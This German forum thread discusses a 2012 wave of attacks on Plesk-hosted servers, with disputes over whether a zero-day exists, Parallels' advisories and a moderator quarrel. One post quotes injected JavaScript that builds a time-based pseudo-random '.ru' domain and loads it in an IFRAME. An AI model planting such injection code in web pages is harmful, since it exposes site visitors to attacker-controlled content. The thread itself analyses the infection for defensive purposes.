Diskussion: 0-Day-Exploit für Site-Verwaltungswerkzeug Plesk im Umlauf

[IDM-Service.de]

Wenn ich mir eine Anmerkung erlauben darf: Es wäre ja wohl der "Burner", wenn Plesk 11 betroffen wäre, wo doch der Hersteller selbst dazu auffordert, das Panel zu upgraden. (.... upgrade to the latest version of Parallels Plesk Panel 11)

Da bekommt der Satz: "Parallels takes the security of our customers very seriously.." auf http://kb.parallels.com/en/114330 ja eine völlig neue Bedeutung!

 

[aiko]

Da bekommt der Satz: "Parallels takes the security of our customers very seriously.." auf http://kb.parallels.com/en/114330 ja eine völlig neue Bedeutung!

Ist doch nichts neues, dass auch aktuelle Software Exploits beinhaltet oder ?

 

[Joe User]

Solange Parallels selbst im Dunkeln tappt (8000$ sind dem Unternehmen wohl zuviel) und sich noch immer auf einen alten Bug stürzt, der nach den derzeitigen Beobachtungen nichts mit der aktuellen Situation zu tun hat (auch wenn er sie begünstigen kann), kann man Plesk 11.0 nicht als "sicher" deklarieren. Aber vielleicht ist Huschi ja schlauer und kann eine belegbare Entwarnung geben...

 

[PapaBaer]

@IDM-Service.de: Definiere 0-Day...

 

[its]

Was ich bis jetzt herausgefunden habe ist, dass diese "random" Domains in IFRAMES verpackt, vermehrt auftauchen.

IFRAME code:

var unix = Math.round(+new Date() / 1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx");

Ob das mit der aktuellen Sicherheitslücke oder der von vor 2-3 Monaten zu tun hat, ist noch unklar. Die Analysen laufen noch...

 

[Joe User]

Also mutiert der Exploit beziehungsweise dessen Payload schon fleissig und die Betroffenen haben immer weniger Möglichkeiten, dem Ganzen mit einfachen Mitteln Herr zu werden. Bin ja mal gespannt, wann der erste Bericht über ein auf diesem Wege eingeschleustem Botnet oder Rootkit auftaucht...

 

[Whistler]

Mir ist nicht ganz klar, ob sich das auf denselben Bug bezieht, da nunmehr von Linux die Rede ist:
http://blog.sparktrust.com/plesk-vulnerability-exploited-in-the-wild/

 

[Joe User]

Ja, auch dort geht es um die aktuelle Infektionswelle.

 

[Huschi]

Hast Du einen Beleg dafür, dass Plesk 11.0 nicht betroffen ist?

Als vernünftig denkender Mensch sollt man die Unschuldsvermutung mit einbeziehen:

Jeder [Anm.: alles] ist unschuldig bis seine Schuld bewiesen ist.

Aber es gibt neue Veröffentlichungen:
Anscheinend hat Parallels die Lücke doch entdeckt: http://kb.parallels.com/en/114379
Wenn sie das wirklich ist, so gilt weiterhin: Plesk 11 ist nicht betroffen.
Außerdem hat sich an verschiedenen Ecken des Internets noch keiner mit einem betroffenen Plesk 11 gemeldet.

Und auf Bemerkungen von Leuten die sich mit der Materie (hier "Plesk") prinzipiell nicht befassen, sondern nur (meist negative oder gar fehlerhafte) Informationen darüber zusammenfassen und wiedergeben, sollte man besser nicht hören.
Solche Berichte findet man in jede Ausgabe der Bildzeitung! Leider haben hier aber einige der Panikmacher genau dieses Niveu.

huschi.

 

[Joe User]

So, die Verwarnung kassiere ich dann gerne:

Mein lieber Huschi, wenn Du Deinen persönlichen kleinen Privatkrieg gegen mich hier weiterhin entgegen der Nutzungsbedingungen des SSF führen willst, dann bitte ohne Deinen Mod-Status und die Rückendeckung des SSF-Teams, damit Du die gleichen Verwarnungen kassierst, welche Du mir übertriebenerweise bei jedweder kleinen Gelegenheit reindrückst.

Ich bin es leid, von Dir hier ständig diskreditiert zu werden, ohne die Chance zu erhalten, mich dagegen zur Wehr setzen zu können. Deine Verwarn- und Löschorgien (alle archiviert) gehen mir gewaltig auf die Nerven und zeugen nur von Deiner Kritikunfähigkeit.

EOD & f'up2/dev/null <-- Daran darfst auch Du Dich gerne mal halten, danke.




Damit auch etwas On-Topic dabei ist: Unschuldsvermutung und Security passen per se nicht zusammen, denn in der Security ist erstmal Alles böse bis das Gegenteil bewiesen ist. Ein Beispiel für unseren hochgeschätzten Huschi: Der Default für echte Firewalls steht auf Deny und nicht auf Pass, warum wohl? Oder warum unterliegt professioneller Programmcode grundsätzlich mindestens einem Review und einem Audit? Wegen der Unschuldsvermutung? Sorry Huschi, aber wenn das Deine Einstellung zur Security ist, dann solltest Du Dich dringend mit den Grundlagen eben dieser beschäftigen und bis Du sie begriffen hast, von Kommentaren in diesem Bereich Abstand nehmen.

Und nun bin ich so gar noch so dreist und markiere den entscheidenen Satz aus dem von Huschi verlinkten KB-Artikel fett:

Resolved issues were discovered during Plesk internal testing. These issues are not known to be available on public, so Parallels releases limited information.

Damit kann also definitiv nicht der hier im Thread diskutierte Bug gemeint sein, denn der ist known to be public und wurde nicht durch internal testing gefunden...

 

[Whistler]

Also mir ist nich bekannt, was ich wohin senden muß, um Plesk zo rooten.
Einen CVE- oder sonstigen öffentlichen Eintrag scheint es ebenfalls noch nicht zu geben.
Also bekommt man die Informationen nur gegen 8000$ und das ist alles andere als öffentlich.

Das Update besteht aus zwei Teilen. Agent.php ist ein Teil der Remote API (falls installiert) und wurde am 14. März mittags geändert.
Das könnte wirklich mit der "alten" Verwundbarkeit zusammenhängen und den Eintrag von heute vormittag erklären:

UPDATE AS OF JULY 15, 2012 10:30am PDT: After deep investigation, Parallels has been unable to substantiate any claims of this vulnerability. All reported issues have been traced back to the vulnerability from February http://kb.parallels.com/113321 , which has had patches and remediation steps available since then as well. Parallels has issued this security advisory to remind and urge all customers to stay up-to-date with all the latest Plesk MicroUpdates to ensure stable and secure operation. By applying this new MicroUpdate, all previous MicroUpdates will also be applied (including February’s).” Please read the following to make sure you are fully aware of the situation

Allerdings hat man dann am Nachmittag doch noch die common_func.php3 und die help.php neu übersetzt (gegenüber dem alten Stand ein paar Byte größer) und nur drei Stunden später (soweit zur internen Qualitätskontrolle) verteilt.

 

[Huschi]

Nur dazu:

Deine Verwarn- und Löschorgien (alle archiviert)

Das Archiv der Löschungen ist recht klein. Das Archiv Deiner Troll-PMs bzgl. wie ungerecht jede einzelne Verwarnung Deiner Meinung nach ist, belegt mehrerer Megabytes.
PS: Ist in Deinem Archiv auch unser erster Zusammenstoß aus Deinem Forum drin? Denn den gibt ja ja auch nicht mehr live zu sehen.

Und jetzt meine übliche Moderation gegen die Du wieder verstoßen wirst weil Du angeblich keine Möglichkeit findest Dich dagegen zu wehren und eh wieder alle voll gemein zu Dir sind:
<Moderation>
Topic ist und bleibt der ursprüngliche Thread-Titel.
Und ich hoffe wir erreichen mal eine höhere Niveu-Stufe.
</Moderation>

Und zum Topic:

denn der ist known to be public

Da es kein offizielles Statement von Parallels zu der Exploit-Software gibt (oder hab ich irgendwo was überlesen?), ist es fraglich ob man von "public" reden kann.

huschi.

 

[slade87]

Um mal zurück zum Topic zukommen. Das ist jetzt vielleicht keine Allzweckwaffe gegen Plesk Exploits aber ich empfehle allen sich den Link hier mal zu Gemüte zuführen funktioniert 1A und HTACCESS läuft wie es soll. Ich habe das ganze statt mit PLAIN mit HTPASSWD gemacht.

[Howto] Plesk Control Panel zusätzlich mit htaccess schützen.

[Howto] Plesk 9 bzw. 10 Control Panel zusätzlich mit htaccess schützen. Hier ein kleines Tutorial, wie man den Plesk 9 und auch Plesk 10 Admin-Login zusätzlich mit .htaccess schützen kann. Zuerst erstellen wir im Ordner /opt/psa/admin eine Passwortdatei mit dem Namen .meinepasswortdatei mit...

serversupportforum.de

 

[Huschi]

Seit gestern Abend ist eine offizielle Stellungsnahme von Parallels online:
http://forum.parallels.com/announcement.php?a=40

Zusammenfassung:
Laut Parallels gibt es keine 0-Day-Vulnerability.
Alle von Parallels untersuchten angegriffenen Server haben nicht alle Schritte aus der im Februar bekannt gewordenen Lücke erfüllt. Z.B. die Session-Tabelle nicht geleert und insbesondere keine neue Plesk-Passwörter vergeben.
Außerdem litten die Server wohl auch unter veralteten Betriebsystemen bzw. mangelnden Updates. Sowohl Windows als auch Linux.


Diskussion:
Ich mag es in der Regeln nicht unnötige Angst zu schüren. Bin mir aber nicht sicher ob es wirklich keine 0-Day-Vulnerability gibt/gab. Dafür war die Angriffs-Welle zu gezielt, zu einheitlich und zeitlich sehr kompakt.
Ein Rückschluss aus der Stellungsnahme ist, dass dieser Angriff von den selben Leute kommt wie schon im Februar. Demnach wurde damals die Plesk-User-Tabelle ausgelesen, in Ruhe die Passwörter entschlüsselt und neulich dann die JS-Manipulation (evtl. automatisiert) vorgenommen. Da liegt fast ein halbes Jahr dazwischen. Und warum dann alle Server auf einmal? Damit erregt man doch nur Aufmerksamkeit. Sogar von Admins die sich sonst nicht um ihren Server kümmern.
Wie man merkt, bin ich mir noch sehr unschlüssig diese Darstellung zu glauben.

huschi.

 

[DjTom-i]

Ich glaube hier kein Wort von dem was die sagen, sonst hätte es in den letzten 7 Tagen keinerlei File Releases gegeben über den autoinstaller.
Warum wurde dann ein MU released?

Und wenn mir einer sagt: Hej da ist ein 0day im Umlauf, klar mache ich dann einen erneuten Security Audit. Wenn man keine Eier hat kommt dann irgendwie sowas wie diese lächerliche Stellungnahme.

Pinoccios Nase war entschieden kürzer!

Hoffe nur das die das richtige Loch in diesem Schweizer Käse gestopft haben.